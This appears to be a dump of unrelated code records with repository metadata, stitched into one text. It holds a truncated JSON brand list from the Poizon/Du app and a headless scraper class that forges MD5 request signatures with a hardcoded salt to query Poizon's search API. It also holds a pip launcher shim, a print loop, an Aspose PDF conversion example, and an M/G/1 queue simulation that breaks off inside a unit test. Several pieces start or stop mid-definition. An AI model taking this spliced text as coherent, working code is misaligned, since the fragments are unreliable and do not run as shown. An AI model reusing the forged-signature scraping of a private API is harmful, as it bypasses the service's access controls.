Beauté","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24675byte_c3c1c3b08d7926e82fd1681f920a955f_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10278,"brandName":"LANCOME","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22324byte_41fe4c8042bfd4761df3cbde50eb1ab0_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10023,"brandName":"FENDI","type":0,"logoUrl":"https://du.hupucdn.com/news_byte3735byte_363b11ad1f4b34f6b165818fe14ded88_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10279,"brandName":"Kiehls","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22486byte_39f44b549295514934db3bea8696551a_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10280,"brandName":"MAC","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20822byte_0d14fc90e743b48c0d198505ac7acbbd_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10026,"brandName":"Yves Saint Laurent","type":0,"logoUrl":"https://du.hupucdn.com/news_byte29430byte_88593ab0095ed38806e07d4afd4889cf_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10282,"brandName":"LA MER","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21643byte_c2302d6ae27f2fa9569a224a49da3097_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10284,"brandName":"CLARINS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23308byte_a69c3dfc25e7a7c6400ffe44d8242a30_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10285,"brandName":"NARS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25821byte_311c624a310303b590d5d4c062f056ea_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10286,"brandName":"benefit","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25499byte_f2dadfa1b21c81b9e659300bf07e8d37_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10287,"brandName":"GLAMGLOW","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22830byte_eb7b37c9e623fc1b2ee13c291e1a29aa_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10288,"brandName":"Too 
Faced","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22156byte_47dd9a1fe0969e1648e912ee16cbb844_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10289,"brandName":"URBAN DECAY","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21218byte_dc1d505013e356a3479ad5295b6f1e75_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10290,"brandName":"FOREO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20670byte_924d6ad6b63fda5c7dae0c77b6e55a3f_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10035,"brandName":"Dyson","type":0,"logoUrl":"https://du.hupucdn.com/news_byte28101byte_18fa7633c4e27f221c840813d784080f_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10291,"brandName":"Christian Louboutin","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24594byte_d45524f35597ed91bbd7544f9e652172_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10293,"brandName":"xVESSEL","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23132byte_cc28fa998fb6243eb71054f6c2135db9_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10044,"brandName":"TISSOT","type":0,"logoUrl":"https://du.hupucdn.com/news_byte31626byte_d4191837d926ec7bbd1e29c5fe46e595_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10300,"brandName":"PRIME 1 STUDIO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21836byte_44d1b5dc422073743a3c11647a8409a3_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10047,"brandName":"MCM","type":0,"logoUrl":"https://du.hupucdn.com/news_byte50051byte_3ed4a130ff4dc02151428c3e50978942_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10310,"brandName":"acme de la 
vie","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22262byte_a8a932aaedbab86b34249828b7ed32f8_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10311,"brandName":"BE@RBRICK","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23466byte_2e8da4a1f054a8e4682594a45612814e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10065,"brandName":"Timberland","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25895byte_88b2058d896df08f73cd94a47d2310f2_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1000018,"brandName":"RAF SIMONS","type":0,"logoUrl":"https://du.hupucdn.com/FkYorY5yQT4Q4E66tjPrzETZ7R-p"},"seriesList":[]},{"brand":{"goodsBrandId":10068,"brandName":"PANERAI","type":0,"logoUrl":"https://du.hupucdn.com/news_byte32912byte_36220760228f319bb75f52330c7e4b3e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1000020,"brandName":"正负零","type":0,"logoUrl":"https://du.hupucdn.com/FsrWiDmNZYaV1MjkRu0KMGU065zO"},"seriesList":[]},{"brand":{"goodsBrandId":10069,"brandName":"MIDO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte26922byte_be1c2be794cb6d454620f4692647e268_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10070,"brandName":"Dupont","type":0,"logoUrl":"https://du.hupucdn.com/news_byte28213byte_3d762e61d0d0ab8dec7d7dd92fe1dc99_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10071,"brandName":"kindle","type":0,"logoUrl":"https://du.hupucdn.com/news_byte27862byte_be5d55c9c358e569b89fbf8e12fc20a4_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10331,"brandName":"WHY 
PLAY","type":0,"logoUrl":"https://du.hupucdn.com/news_byte28380byte_363531321a5e823c56cc2f933f3be497_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10078,"brandName":"Logitech","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21472byte_ce700f9b3ca84b7a4a5f308f82bae04e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10341,"brandName":"anello","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25573byte_8080b45548c4b17bc976f8797ff158d5_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1000045,"brandName":"DMCkal","type":0,"logoUrl":"https://du.hupucdn.com/FtcBWuRAZXH8rxoRoJSQDhQID6sT"},"seriesList":[]},{"brand":{"goodsBrandId":10350,"brandName":"A-COLD-WALL*","type":0,"logoUrl":"https://du.hupucdn.com/news_byte17623byte_ebcbe70f089dabe23e93588dc6ac66a3_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10354,"brandName":"CONKLAB","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21404byte_7fb50713eb0f986354735b304d5be896_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10101,"brandName":"GENANX/闪电","type":0,"logoUrl":"https://du.hupucdn.com/news_byte33425byte_c27fb3124848c48aee19c85441352048_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10358,"brandName":"FOOT 
INDUSTRY","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20338byte_4e3b752398bf7ff9e16d9fe37e4ecee9_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10360,"brandName":"BONELESS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte17690byte_8c346bdce381e0cf63c76f187a4fe042_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10361,"brandName":"umamiism","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22545byte_34df2f448a017f7fdb3e570606c241b9_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10362,"brandName":"华人青年","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22601byte_f52dc5ab9f4452f97babc47821d24021_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10363,"brandName":"FUNKMASTERS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21027byte_1576a0f677e9cacd8762be6db99d4c78_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1000061,"brandName":"GUESS","type":0,"logoUrl":"https://du.hupucdn.com/Fi6tDRWTi5rnQiW-ZB5BB-FbPoZN"},"seriesList":[]},{"brand":{"goodsBrandId":1000062,"brandName":"Needles","type":0,"logoUrl":"https://du.hupucdn.com/FiwdfFP76yqpag1r50r1qVG-TXad"},"seriesList":[]},{"brand":{"goodsBrandId":10368,"brandName":"Subtle","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21987byte_4b242f882bf5df63b2da5eae632fa29c_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10116,"brandName":"EMPORIO 
ARMANI","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22342byte_7060a8a9b7c6b335143673f5417a1944_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10124,"brandName":"AMONSTER","type":0,"logoUrl":"https://du.hupucdn.com/FjZYBGDKtsc_9n8ftq28XsMRxZxB"},"seriesList":[]},{"brand":{"goodsBrandId":10381,"brandName":"PCMY","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21692byte_205236932bf037dab9965dd2be87085e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10127,"brandName":"Rothco","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24098byte_12c50dcd1c1044fa4a6335bedd98e7d4_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10131,"brandName":"THE WIZ","type":0,"logoUrl":"https://du.hupucdn.com/news_byte6823byte_6a92589a3c42dcb6a1f3e849966daf53_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10388,"brandName":"TSMLXLT","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20983byte_d18f9145f160a5dd3b5d0ca45acec510_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10390,"brandName":"TRICKCOO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25337byte_823a55d69768b65e728f896971a0185d_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10391,"brandName":"NOCAO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22420byte_91b1ed0e11d4948a817f5ae35a0bfd99_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10136,"brandName":"PROS BY 
CH","type":0,"logoUrl":"https://du.hupucdn.com/news_byte6186byte_323eba7633b20d61d566dbc0bdb83f13_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10137,"brandName":"OXY","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24524byte_535ab7db658c3f1c8e00a821e5587585_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10394,"brandName":"FLOAT","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25774byte_07be4b895302ee06cbd9ad53aa017ed5_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10143,"brandName":"Suicoke","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22613byte_16cd0ea92dde2aea19b76b46491814bb_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10146,"brandName":"GARMIN","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20845byte_5af278c31aad1b5e0982544840c2df96_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10151,"brandName":"BANPRESTO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte56132byte_ee71a1bac952dac4cd3f59b4c6673203_w800h800.jpg"},"seriesList":[]},{"brand":{"goodsBrandId":10153,"brandName":"Harman/Kardon","type":0,"logoUrl":"https://du.hupucdn.com/news_byte17446byte_134385ee63bf9d12cd7f98e27344310e_w150h150.jpg"},"seriesList":[]},{"brand":{"goodsBrandId":10413,"brandName":"OSCill","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23787byte_88a0a8c1b72cd8693957af2a53b89bd5_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10414,"brandName":"LIFEGOESON","type":0,"logoUrl":"https://du.hupucdn.com/FgHxeSwXg9SKBtRNrNNKjn-O8yxf"},"seriesList":[]},{"brand":{"goodsBrandId":10161,"brandName":"PSO Brand","type":0,"logoUrl":"https://du.hupucdn.com/news_byte47498byte_0bb2a47154dfa0fc914e98cfeae6c407_w1000h1000.jpg"},"seriesList":[]},{"brand":{"goodsBrandId":10167,"brandName":"EVISU","type":0,"logoUrl":"https://du.hupucdn.com/news_byte8745byte_0ba5f52e059d3e91803a05843c2b22e2_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10423,"brandName":"Maison 
Margiela","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22857byte_d8df7145e944cd7b203d3f5520b06c43_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10168,"brandName":"INXX","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20442byte_4c50ce6dca7408dec92df78b72106e46_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10169,"brandName":"B&O","type":0,"logoUrl":"https://du.hupucdn.com/news_byte36636byte_b32fd6036ba60c4f868b197ada8b8c6f_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10425,"brandName":"Charlie Luciano","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21051byte_28faf07c5d5a078a6fc18357413ce7c3_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10170,"brandName":"CITIZEN","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21252byte_1158debba23c31ccfed657aa8ce762bd_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10171,"brandName":"LOFREE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22408byte_1af23b04a9bc352bfff21edb63514d39_w150h150.jpg"},"seriesList":[]},{"brand":{"goodsBrandId":10429,"brandName":"Arcteryx","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24934byte_5ebce6f644ee8ebdbc89f04a068fc1af_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10174,"brandName":"DAMTOYS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte31687byte_84591020e1a16ce89318585a5d84e9fc_w150h150.jpg"},"seriesList":[]},{"brand":{"goodsBrandId":10175,"brandName":"POP 
MART","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24981byte_909c5a578874dac97c6d3796be69cdf3_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10179,"brandName":"野兽王国","type":0,"logoUrl":"https://du.hupucdn.com/news_byte36849byte_5af274d0628f77ca06994e30ed50d5c4_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10183,"brandName":"ALIENWARE/外星人","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25149byte_458a868f82f2ac201e5d2f56fc087d60_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10184,"brandName":"Herschel","type":0,"logoUrl":"https://du.hupucdn.com/news_byte34213byte_403f7a96cd33f1cfdb12769a7e870f65_w824h752.png"},"seriesList":[]},{"brand":{"goodsBrandId":10187,"brandName":"科大讯飞","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25000byte_8351390b01275c1fcaa8f20a040b6dfe_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10443,"brandName":"chinism","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21910byte_d24daabd4b84bba6c37e22a42dd18602_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10188,"brandName":"韶音","type":0,"logoUrl":"https://du.hupucdn.com/news_byte6089byte_b5d736ec8a0c1269eceb94dcfa520c37_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10190,"brandName":"SAINT 
LAURENT","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21416byte_6836702d9d6f487e44b8922d8eaeb86b_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10193,"brandName":"SPALDING","type":0,"logoUrl":"https://du.hupucdn.com/news_byte27011byte_12f13f15a9a198939f3d9b847dbdb214_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10195,"brandName":"Levis","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23207byte_ad584d3079f341b83325f4974b99e342_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10196,"brandName":"SENNHEISER","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21466byte_f597724d3c9eb3294441c608cb59e1fe_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10197,"brandName":"CASETIFY","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23539byte_3a85a808033ed920a29cac5fad902b6f_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10199,"brandName":"JMGO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte26989byte_cdd8e059931aa405f55c5d2426862a6b_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10200,"brandName":"PHILIPS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24239byte_5655ed4f287863630934c96aa823346a_w150h150.jpg"},"seriesList":[]},{"brand":{"goodsBrandId":10201,"brandName":"SEIKO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22717byte_6bfa41469825cfd6c70f5e3080d5de6a_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10202,"brandName":"GENANX","type":0,"logoUrl":"https://du.hupucdn.com/news_byte9514byte_77dee80e931dfd8b528f609c400951e4_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10204,"brandName":"TIANC","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21593byte_aa160ed7e50ca090d629490010346a9a_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10205,"brandName":"Drew 
House","type":0,"logoUrl":"https://du.hupucdn.com/news_byte30015byte_31ba151ba30e01ae6132ce9584b4e49a_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10206,"brandName":"小米/MI","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23786byte_d04434a4af3b56e20758cbeaed4f4531_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10207,"brandName":"CALVIN KLEIN","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24775byte_736593d1ee0995be050b1fbcec77bf46_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":2016,"brandName":"DanielWellington","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21711byte_f48145a65169f913b0139ff2e1811e78_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10211,"brandName":"飞智","type":0,"logoUrl":"https://du.hupucdn.com/news_byte26616byte_8001c14855f8528d7bccc31183bfaf75_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10213,"brandName":"TOM FORD","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21248byte_2994883ac1627497e75e9b99ba327c48_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10485,"brandName":"RickyisClown","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22583byte_98f823c8acb1459e6c72f5bdaf8a88b0_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10233,"brandName":"Dr.Martens","type":0,"logoUrl":"https://du.hupucdn.com/news_byte31892byte_8d31e2f10cc7fffe8d99545d757dfff6_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10238,"brandName":"APPortfolio","type":0,"logoUrl":"https://du.hupucdn.com/news_byte30968byte_19dd10185fc4b82037621b3708a613e4_w150h150.png"},"seriesList":[]}]},"status":200}
super(DuGet, self).__init__()
def sign(self, raw_sign_code_str):
    """Return the hex MD5 digest of the raw sign string (UTF-8 encoded)."""
    return hashlib.md5(raw_sign_code_str.encode("utf8")).hexdigest()
def search_keywords(self, keywords, sortMode=1, sortType=1, page=0):
    """Query the keyword goods-search endpoint.

    Returns a tuple ``(soldNum, price, others_json)`` where ``soldNum`` is -1
    and ``price`` is 0 when no unique match is found, and ``others_json`` is a
    JSON list of candidates when 2-4 products matched.
    """
    # Keyword goods-search API
    sign = self.sign('limit20page{}showHot-1sortMode{}sortType{}title{}unionId19bc545a393a25177083d4a748807cc0'.format(page, sortMode, sortType, keywords))
    url = 'https://app.poizon.com/api/v1/h5/search/fire/search/list'
    params = {
        'sign': sign,
        'title': quote(keywords),
        'page': page,
        'sortType': sortType,
        'sortMode': sortMode,
        'limit': '20',
        'showHot': '-1',
        'unionId': ''
    }
    soldNum, price, others = -1, 0, []
    try:
        payload = requests.get(url, headers=self.headers, params=params, timeout=5).json()
        total = payload['data']['total']
        if total == 1:
            # Exactly one hit: extract its stats; price comes back in cents.
            product = payload['data']['productList'][0]
            soldNum = product.get('soldNum', -1)
            price = product.get('price', 0)
            if price > 0:
                price = price / 100
        elif 1 < total < 5:
            # A small ambiguous set: return all candidates for manual review.
            others = [
                {"soldNum": product.get('soldNum'), "price": product.get('price'), "title": product.get('title')}
                for product in payload['data']['productList']
            ]
    except Exception as e:
        logger.error("{}:{} {} {}".format(self.__class__, url, keywords, e))
    return soldNum, price, json.dumps(others)
def show(self):
    """Placeholder for an ad-hoc smoke test; intentionally a no-op.

    Example manual check (disabled): instantiate ``DuGet``, call
    ``search_keywords('fw9348', 1, 1)`` and print ``soldNum``/``price``/
    ``minSalePrice`` fields of the single product when ``total == 1``.
    """
    pass
def run(self):
    """Worker loop: pull (db_id, good_id) tasks, query Du, push results.

    Runs forever; intended as a thread target.  Progress is logged every
    100 processed items.
    """
    logger.info("start thread {}".format(self.__class__))
    statistic_count = 0
    while True:
        if self.task_queue.empty():
            time.sleep(1)  # idle-wait for new work
            continue
        items = self.task_queue.get()
        db_id, good_id = items[0], items[1]
        soldNum, price, others = self.search_keywords(good_id)
        self.results_queue.put((db_id, soldNum, price, others))
        statistic_count += 1
        if statistic_count % 100 == 0:
            logger.info("{} done {}, current {}:{}".format(self.__class__, statistic_count,
                                                           self.task_queue.qsize(), self.results_queue.qsize()))
        # Random jitter between requests; self.sleep is presumably set in
        # __init__ (outside this view) — confirm.
        time.sleep(random.uniform(0, self.sleep))
| [
"798990255@qq.com"
] | 798990255@qq.com |
86e5353a7974d04d870bbcee14783ed107db730b | 26d3a7f99d3b24d92d84a362cc9c2aacb79dce73 | /venv/Scripts/pip3.8-script.py | a2398637eb894be0dda9050d415e609f1da0c2a4 | [] | no_license | LadislavTebich/Test_LT | d0d7f18d9f8231574018e916a2a9a0a5dbf236f3 | 54cbd0d026759f75331994e250b5c4325e2db2df | refs/heads/master | 2022-12-04T06:56:50.444142 | 2020-08-19T12:57:36 | 2020-08-19T12:57:36 | 288,732,294 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | #!C:\Users\tebiclad\PycharmProjects\novy\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.8'
# Auto-generated setuptools console-script shim: resolves the 'pip3.8' entry
# point from the pinned pip distribution and exits with its return code.
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point

if __name__ == '__main__':
    # Strip the Windows '-script.py'/'.exe' suffix so argv[0] reads 'pip3.8'.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.8')()
    )
| [
"la.te@post.cz"
] | la.te@post.cz |
7bbbb1ef33734dd3fa84fcaa6ef4c6c904a371fa | 85171ce2cbf92c8d2d6893662a63ef0406e4c943 | /8번.py | 48f0aaefcc4860c12fb828caa9a4c13097646e3e | [] | no_license | kdg1969/dogyun981029 | c6ab80d30b2948194e3fee2aa3c8f2c9f9ea8f51 | 22d09200bf2566fc8e2ef3986601001e2237e48f | refs/heads/master | 2020-03-17T08:59:30.829165 | 2018-05-15T14:43:03 | 2018-05-15T14:43:03 | 133,457,522 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 75 | py | import time
# Print 1..5 on one line, pausing one second between numbers.
for i in range(1, 6):
    print(i, end=' ')
    time.sleep(1)
| [
"39289393+kdg1969@users.noreply.github.com"
] | 39289393+kdg1969@users.noreply.github.com |
e26dd02fe5d3ca61446aeb44694672a6852d2685 | a38eae05908efc50667b225d470dc28c8057abde | /Examples/put_pdf_request_tiff.py | ce8af07eee102d4b02c260fdae51edb4dc62138f | [
"MIT",
"Python-2.0"
] | permissive | aspose-pdf-cloud/aspose-pdf-cloud-python | 9fcceff7ee0df1d4594d4e508212a20059034ee5 | f462bf34d587232b7f0eea664b2725c9fa644c6c | refs/heads/master | 2023-09-03T12:57:11.864388 | 2023-08-24T12:46:37 | 2023-08-24T12:46:37 | 127,921,519 | 9 | 5 | MIT | 2023-08-24T12:46:38 | 2018-04-03T14:32:18 | Python | UTF-8 | Python | false | false | 254 | py | from configuration import *
# Convert a PDF uploaded with the request body to TIFF via the Aspose.PDF
# Cloud API and print the API response.
file_name = '4pages.pdf'
result_file_name = "result.tiff"

opts = {
    "file": test_data_path + file_name  # local PDF sent in the request
}

response = pdf_api.put_pdf_in_request_to_tiff(
    temp_folder + '/' + result_file_name, **opts)
pprint(response)
| [
"mateen.sajid@systemsltd.com"
] | mateen.sajid@systemsltd.com |
13c1a1145d7bfb16e18555515b82e854b1115287 | ce5b0928e1044c6f05aeff18f19178fb8838bab7 | /QueueingSystems/mg1_model.py | 0e5f4029d6372e84dddce588da1f465f5a1139dd | [] | no_license | eth-cscs/abcpy-models | b79abc0778c17b2beabe3b30b899a02392060ed2 | be3c648b19ddf5770482216a9381db5bbcdb3d24 | refs/heads/master | 2022-03-12T20:43:57.973456 | 2022-02-22T17:00:27 | 2022-02-22T17:00:27 | 101,402,025 | 11 | 8 | null | 2021-09-10T15:06:22 | 2017-08-25T12:33:11 | Python | UTF-8 | Python | false | false | 4,206 | py | import unittest
import numpy as np
from abcpy.continuousmodels import ProbabilisticModel, Continuous, InputConnector
class MG1Queue(ProbabilisticModel, Continuous):
    """Simulates a M/G/1 queueing system with Uni[theta1, theta2] service times
    and Exp(theta3) interarrival times.

    ``forward_simulate`` returns the interdeparture times of the first
    ``number_steps`` customers, assuming the queue starts empty.

    [1] Nelson, Barry. Foundations and methods of stochastic simulation: a first
    course. Springer Science & Business Media, 2013.
    """

    def __init__(self, parameters, number_steps=5, name='M/G/1'):
        """
        Parameters
        ----------
        parameters : list
            [theta1, theta2, theta3]: service-time bounds and arrival rate
            (or the corresponding abcpy input nodes).
        number_steps : int
            Number of interdeparture times to simulate (output dimension).
        name : str
            Model name forwarded to the abcpy base class.
        """
        self.number_steps = number_steps
        input_parameters = InputConnector.from_list(parameters)
        super(MG1Queue, self).__init__(input_parameters, name)

    def forward_simulate(self, input_values, num_forward_simulations, rng=np.random.RandomState()):
        """Draw ``num_forward_simulations`` independent trajectories.

        Returns a list of 1-D arrays, each of length ``number_steps``.
        The default ``rng`` is created once at definition time (abcpy
        convention); pass ``rng`` explicitly for reproducibility.
        """
        theta1 = input_values[0]
        theta2 = input_values[1]
        theta3 = input_values[2]

        simulations = self.simulate_mg1_vectorized(theta1, theta2, theta3, rng, num_forward_simulations)
        # One column per simulation -> one array per list entry.
        return [simulations[:, i] for i in range(num_forward_simulations)]

    def simulate_mg1_single(self, theta1, theta2, theta3, rng):
        """Simulate one trajectory via the Lindley recursion (notation follows
        chapter 4.3 of [1]): Y waiting times, X service times, A interarrivals.
        """
        Y = np.zeros(self.number_steps + 1)
        X = np.zeros(self.number_steps + 1)
        A = np.zeros(self.number_steps + 1)
        inter_dep = np.zeros(self.number_steps + 1)
        for i in range(1, self.number_steps + 1):
            A[i] = rng.exponential(scale=1 / theta3)  # scale is 1/rate
            X[i] = rng.uniform(theta1, theta2)
            Y[i] = np.max([0, Y[i - 1] + X[i - 1] - A[i]])
            # Interdeparture time of customer i:
            inter_dep[i] = A[i] + X[i] + Y[i] - Y[i - 1] - X[i - 1]
        return inter_dep[1:]

    def simulate_mg1_vectorized(self, theta1, theta2, theta3, rng, num_forward_simulations=1):
        """Vectorized Lindley recursion over ``num_forward_simulations`` columns.

        Returns an array of shape (number_steps, num_forward_simulations).
        """
        Y = np.zeros((self.number_steps + 1, num_forward_simulations))
        X = np.zeros((self.number_steps + 1, num_forward_simulations))
        A = np.zeros((self.number_steps + 1, num_forward_simulations))
        inter_dep = np.zeros((self.number_steps + 1, num_forward_simulations))
        for i in range(1, self.number_steps + 1):
            A[i] = rng.exponential(scale=1 / theta3, size=num_forward_simulations)  # scale is 1/rate
            X[i] = rng.uniform(theta1, theta2, size=num_forward_simulations)
            # np.inf instead of the deprecated np.infty (removed in NumPy 2.0);
            # clip from below with 0.
            Y[i] = np.clip(Y[i - 1] + X[i - 1] - A[i], a_min=0, a_max=np.inf)
            inter_dep[i] = A[i] + X[i] + Y[i] - Y[i - 1] - X[i - 1]
        return inter_dep[1:]

    def get_output_dimension(self):
        """Output dimension equals the number of simulated steps."""
        return self.number_steps

    def _check_input(self, input_values):
        """Accept [theta1, theta2, theta3] with 0 <= theta1 <= theta2,
        theta2 > 0 and theta3 > 0."""
        if len(input_values) != 3:
            return False
        if input_values[0] < 0 or input_values[1] <= 0 or input_values[2] <= 0 or input_values[0] > input_values[1]:
            return False
        return True

    def _check_output(self, values):
        """All simulated outputs are considered valid."""
        return True
class MG1Tests(unittest.TestCase):
    """Unit tests for MG1Queue: parameter validation and seeded simulations."""

    def setUp(self) -> None:
        theta1 = 1
        theta2 = 3
        theta3 = 0.4
        self.model = MG1Queue([theta1, theta2, theta3])
        self.rng = np.random.RandomState(seed=42)

    def test_check_input(self):
        # Invalid: negative rate; negative lower bound; lower > upper; upper == 0.
